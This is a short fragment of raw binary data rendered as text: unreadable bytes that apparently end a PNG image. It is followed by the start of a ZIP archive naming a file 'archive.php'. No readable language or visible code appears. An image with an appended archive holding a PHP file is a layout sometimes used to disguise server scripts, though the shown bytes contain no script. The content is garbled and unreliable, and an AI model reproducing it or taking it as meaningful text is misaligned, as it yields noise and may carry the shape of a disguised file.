FoMZ27N'=8o,L5b%;:A!p}n}ahf%Om/_u2 [Szyٚ=x&0ſ?ԛGvj4_b0tə}S#G_?&ft/ؼ#?I-|OvzЌe xY}o/jմw_8h{?Wy!(:)!p|mpǜS;Ĺ^tڷ˾2Wr@{*R"WL L6n^9w5Is@u!p29ga_ZECjw?4eźW47COeHM'(_g{eM,lߤ򓝬fͷW ْZ5s K1×j k%'Ԣ[6͊Z5-, i6lnKr{ap }?[SնY낢lܼ{a9/GeWjνF /3]ێ~غQl=+הWUFk* rj1޴}V@']y͋7lp57fVUTөL릅Z6ٺyv-z`튋aVckߜ{KlSآi!ͯ4&KvI 2!@@@@@@@@@@@@@@@@@@@@@@@         =-)IENDB`PK! archive.phpnu[